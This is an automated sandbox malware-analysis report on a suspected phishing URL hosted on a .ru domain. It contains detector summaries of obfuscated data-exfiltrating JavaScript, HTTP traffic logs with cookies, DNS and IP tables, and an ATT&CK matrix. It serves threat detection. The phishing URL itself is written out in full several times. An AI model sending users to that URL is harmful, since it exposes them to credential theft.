Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://vCyA.warmickmak.ru/PrEvJj/

Overview

General Information

Sample URL:https://vCyA.warmickmak.ru/PrEvJj/
Analysis ID:1577904
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2052,i,8879506869332835902,1222545536640430401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vCyA.warmickmak.ru/PrEvJj/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vcya.warmickmak.ru/PrEvJj/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft Exchange domain upon certain conditions. These behaviors are highly suspicious and indicate a potential phishing or malicious intent.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vcya.warmickmak.ru/PrEvJj/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The script also includes an obfuscated interval function that appears to trigger a redirect after a certain time delay. These behaviors are highly suspicious and indicate a potential attempt to bypass security measures or engage in malicious activities.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vcya.warmickmak.ru/PrEvJj/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://vCyA.warmickmak.ru
Source: https://vcya.warmickmak.ru/PrEvJj/HTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.59.35
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.59.35
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /PrEvJj/ HTTP/1.1Host: vcya.warmickmak.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vcya.warmickmak.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vcya.warmickmak.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vcya.warmickmak.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vcya.warmickmak.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vcya.warmickmak.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f41c4c42e725e78&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vcya.warmickmak.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vcya.warmickmak.ru/PrEvJj/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImE0YThTWFVJa3JQdGExUjc2Mnlpbmc9PSIsInZhbHVlIjoiMUdMMlB3L1VudnIrSWhBNldjdVpRSzZTMlZmOWEwNWF0MG93SERrUUdOamFDRlpEQjIxVWtFUGZYV0gxWVFIanVRNGI3T3ZQdzlNNUlIQkJKRzNXWlNqdU5nQ0VHUGY3a3FiMmREeWlreG9Lb3M3WjExekZBVkJWVzlmd3puN3giLCJtYWMiOiI5MTNiMTU0NzgyOGZiZmFlOThiZDdhNTNkODYzYjE4ZDM4NTI2YzgyZWIzNzFhODU4MGQ2MWM4ZWY1MDJiM2VmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFEVDZENVJqTlN2bzhkSlJBQmdvWkE9PSIsInZhbHVlIjoielNiRHdObDc4N1N3OVo0RktHTWdONWJwbTJ4V2JSL2F0NjlCazNpY1lobWdYbXRCbjErdHlOWk02b1ZmUHBidUVUcW5kVHd0d3ZzajBuNXdiaGpzOWMzeUR5R1lBRlkrRHZMQTlscytTOWoxREkxVFhCSHkzYUozcUVxWHp6VWIiLCJtYWMiOiIzMzE3MGIwZmY3YmI3ZDEwYTBmOWEzNmI5MzQ5OWQ0NjliZmRlOGEyZDY0MjY5YWVjMDlkMTNiZWQ3MmZhMTQ3IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: vcya.warmickmak.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=tdym2354U%2FkLXVDkf6Mdy5pxyztd4NUp8IpHoHd8T3VjJBXIDVwTGw8UIciIpgPqVzh3V8o135uh3EOsDQUFjuV%2Fw4UrWdANjdrtgHFWrwq%2FNucNJ0o3HbXPUy2kTg%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 433Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 20:05:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdym2354U%2FkLXVDkf6Mdy5pxyztd4NUp8IpHoHd8T3VjJBXIDVwTGw8UIciIpgPqVzh3V8o135uh3EOsDQUFjuV%2Fw4UrWdANjdrtgHFWrwq%2FNucNJ0o3HbXPUy2kTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=35949&min_rtt=35853&rtt_var=13513&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2338&delivery_rate=79435&cwnd=246&unsent_bytes=0&cid=db1679216dd293c5&ts=351&x=0"CF-Cache-Status: HITAge: 13412Server: cloudflareCF-RAY: 8f41c4d57eb8f78f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1657&rtt_var=640&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1900&delivery_rate=1685912&cwnd=137&unsent_bytes=0&cid=e741a9f2e72d7bbe&ts=9877&x=0"
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: classification engineClassification label: mal48.win@18/14@20/13
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2052,i,8879506869332835902,1222545536640430401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vCyA.warmickmak.ru/PrEvJj/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2052,i,8879506869332835902,1222545536640430401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://vCyA.warmickmak.ru/PrEvJj/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://vcya.warmickmak.ru/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
vcya.warmickmak.ru
172.67.158.29
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.2.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            www.google.com
            142.250.181.132
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/false
                high
                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                  high
                  https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                    high
                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                      high
                      https://vcya.warmickmak.ru/favicon.icofalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f41c4c42e725e78&lang=autofalse
                          high
                          https://vcya.warmickmak.ru/PrEvJj/true
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.158.29
                            vcya.warmickmak.ruUnited States
                            13335CLOUDFLARENETUStrue
                            104.17.24.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.94.41
                            challenges.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.95.41
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            142.250.181.132
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            151.101.2.137
                            code.jquery.comUnited States
                            54113FASTLYUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            151.101.66.137
                            unknownUnited States
                            54113FASTLYUSfalse
                            35.190.80.1
                            a.nel.cloudflare.comUnited States
                            15169GOOGLEUSfalse
                            104.17.25.14
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            IP
                            192.168.2.4
                            192.168.2.6
                            192.168.2.5
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1577904
                            Start date and time:2024-12-18 21:04:23 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:browseurl.jbs
                            Sample URL:https://vCyA.warmickmak.ru/PrEvJj/
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal48.win@18/14@20/13
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.162.84, 142.250.181.142, 217.20.58.100, 192.229.221.95, 172.217.17.46, 2.20.68.210, 172.217.17.35, 23.218.208.109, 20.12.23.50, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://vCyA.warmickmak.ru/PrEvJj/
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (48316), with no line terminators
                            Category:dropped
                            Size (bytes):48316
                            Entropy (8bit):5.6346993394709
                            Encrypted:false
                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                            MD5:2CA03AD87885AB983541092B87ADB299
                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                            Malicious:false
                            Reputation:low
